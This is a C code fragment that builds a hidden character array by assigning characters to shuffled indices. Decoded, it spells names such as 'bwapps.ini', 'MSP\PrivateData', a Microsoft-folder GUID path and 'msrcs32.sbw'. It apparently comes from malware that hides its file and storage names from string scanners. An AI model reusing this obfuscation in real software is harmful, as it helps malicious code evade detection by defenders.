lpStr[43]='M';
lpStr[60]='i';
lpStr[95]='A';
lpStr[64]='s';
lpStr[54]='D';
lpStr[16]='b';
lpStr[59]='M';
lpStr[114]='s';
lpStr[25]='i';
lpStr[70]='5';
lpStr[105]=NULL;
lpStr[93]='0';
lpStr[45]='P';
lpStr[77]='-';
lpStr[32]='m';
lpStr[44]='S';
lpStr[46]='\\';
lpStr[57]='a';
lpStr[26]=NULL;
lpStr[50]='v';
lpStr[79]='E';
lpStr[29]='p';
lpStr[99]='9';
lpStr[34]='o';
lpStr[84]='3';
lpStr[2]='r';
lpStr[11]='y';
lpStr[31]='o';
lpStr[1]='c';
lpStr[86]='F';
lpStr[66]='f';
lpStr[117]=NULL;
lpStr[13]='i';
lpStr[36]=NULL;
lpStr[96]='2';
lpStr[39]='t';
lpStr[103]='2';
lpStr[28]='p';
lpStr[56]='t';
lpStr[63]='o';
lpStr[15]=NULL;
lpStr[18]='a';
lpStr[108]='r';
lpStr[8]='p';
lpStr[82]='-';
lpStr[51]='a';
lpStr[52]='t';
lpStr[37]='d';
lpStr[53]='e';
lpStr[81]='6';
lpStr[22]='.';
lpStr[10]='s';
lpStr[101]='1';
lpStr[115]='b';
lpStr[35]='n';
lpStr[9]=NULL;
lpStr[111]='3';
lpStr[49]='i';
lpStr[87]='-';
lpStr[80]='8';
lpStr[42]=NULL;
lpStr[19]='p';
lpStr[85]='F';
lpStr[100]='F';
lpStr[65]='o';
lpStr[97]='5';
lpStr[104]='B';
lpStr[17]='w';
lpStr[38]='a';
lpStr[0]='s';
lpStr[83]='4';
lpStr[62]='r';
lpStr[106]='m';
lpStr[109]='c';
lpStr[4]='2';
lpStr[48]='r';
lpStr[47]='P';
lpStr[6]='m';
lpStr[5]='_';
lpStr[116]='w';
lpStr[112]='2';
lpStr[33]='m';
lpStr[71]='C';
lpStr[27]='a';
lpStr[102]='0';
lpStr[7]='s';
lpStr[61]='c';
lpStr[107]='s';
lpStr[40]='3';
lpStr[72]='8';
lpStr[23]='i';
lpStr[67]='t';
lpStr[76]='5';
lpStr[3]='3';
lpStr[89]='3';
lpStr[30]='c';
lpStr[74]='1';
lpStr[20]='p';
lpStr[68]='\\';
lpStr[91]='8';
lpStr[21]='s';
lpStr[75]='7';
lpStr[92]='-';
lpStr[78]='7';
lpStr[90]='B';
lpStr[94]='8';
lpStr[73]='5';
lpStr[12]='s';
lpStr[41]='2';
lpStr[69]='3';
lpStr[55]='a';
lpStr[113]='.';
lpStr[58]=NULL;
lpStr[110]='s';
lpStr[24]='n';
lpStr[98]='3';
lpStr[88]='B';
lpStr[14]='d';
lpStr[118]=NULL;
